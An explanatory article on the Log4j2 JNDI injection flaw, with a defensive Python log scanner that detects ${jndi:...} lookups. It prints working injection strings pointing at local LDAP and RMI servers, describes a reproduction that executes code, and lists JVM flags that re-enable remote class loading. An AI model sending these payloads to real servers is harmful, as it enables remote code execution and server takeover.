Background

The Log4j2 vulnerability has been called a "nuclear bomb" vulnerability. This article walks you step by step through the principle of the vulnerability, how it is triggered, and the scope of its impact.

Basic knowledge

Java provides a powerful lookup facility that relies heavily on JNDI.

JNDI (Java Naming and Directory Interface) provides a directory system that associates service names with objects, so that developers can access objects by name during development.

JNDI is only a top-level wrapper; the underlying layer supports many kinds of access, including the RMI and LDAP that often appear in other articles. For what RMI and LDAP are, see those articles. In short, it is a rich data source: you pass in a name and lookup returns the corresponding object.

Vulnerability principle

For the following simple code, log4j2 resolves the JNDI expression, loads the class via lookup, instantiates the object, and executes its malicious logic (such as deleting files).

LOGGER.error("${jndi:ldap://127.0.0.1:1389/badClassName}");

Looking at common business code on the web, it is very likely that an application prints common attributes such as User-Agent, which results in a JNDI injection vulnerability:

String userAgent = request.getHeader("User-Agent");
logger.info(userAgent);

An attacker who fills in ${jndi:ldap://127.0.0.1:1389/badClassName} as the User-Agent achieves the injection, which shows how low the barrier is.

As the picture shows, the target of a JNDI injection can be either RMI or LDAP; the root cause is the loading of remote code. Java's dynamic class loading, which the attacker takes advantage of here, is a double-edged sword.
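From the defender's side, the User-Agent path described above is easy to spot in web server logs. The following Python scanner is an added example (not code from the original article or its reproduction repository): it reads access-log lines, pulls out the User-Agent field and reports every ${jndi:...} lookup with its scheme, callback host, port and name. The combined log format is an assumption, and the sample lines are constructed; the lookup strings are the ones used in this article.

```python
import re
from typing import List

# A Log4j2 JNDI lookup such as ${jndi:ldap://127.0.0.1:1389/badClassName}.
# Log4j2 resolves lookup prefixes case-insensitively, so match the same way.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Assumed Apache/Nginx "combined" log format; the User-Agent is the last quoted field.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def find_jndi_lookups(text: str) -> List[dict]:
    """Return every JNDI lookup embedded in text (e.g. a User-Agent value)."""
    hits = []
    for m in JNDI_LOOKUP.finditer(text):
        hits.append({
            "scheme": m.group("scheme").lower(),   # ldap or rmi in the article's cases
            "host": m.group("host"),               # where the victim JVM would connect
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "/",        # the name passed to lookup()
        })
    return hits


def scan_access_log(lines) -> List[dict]:
    """Flag requests whose User-Agent would trigger a JNDI lookup if Log4j2 logged it."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; a real scanner would report this too
        for hit in find_jndi_lookups(m.group("ua")):
            findings.append({"client": m.group("ip"), **hit})
    return findings


# Constructed sample lines, not real traffic; the lookup strings are the article's own.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://127.0.0.1:1389/badClassName}"',
    '198.51.100.9 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 88 "-" "${jndi:rmi://127.0.0.1:1099/badClassName}"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['scheme']}://{f['host']}:{f['port']}{f['path']}")
```

Any hit whose host is not one of your own directory servers deserves an alert, and the client address tells you who sent it.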

Reproduction

Reproduction code: github.com/sabersword/… . It provides both the LDAP and the RMI path: run ServerMain to start the RMI Registry, the LDAP server and the HTTP server, then run ClientMain to pop the calculator.

LOGGER.error("${jndi:ldap://127.0.0.1:1389/badClassName}");
LOGGER.error("${jndi:rmi://127.0.0.1:1099/badClassName}");

Beyond opening the calculator, any command can be executed, which is equivalent to the attacker having obtained all the permissions of the user the server runs as. That is what makes it so dangerous.

Notes on reproduction

Because trustURLCodebase, the switch that allows remote classes to be loaded, is turned off in some JDK versions, it is best to turn it on explicitly in ClientMain when reproducing:

-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
-Dcom.sun.jndi.rmi.object.trustURLCodebase=true

The specific JDK versions are as follows. Source: xz.aliyun.com/t/6633

Conclusion

This article draws on 4ra1n.love/post/hbHrd-… , combined with my own understanding and practice. It is written not to teach you how to attack, but in the hope that we understand the harm this vulnerability does, recognize the weaknesses of our systems, and build more secure ones. Mutual encouragement.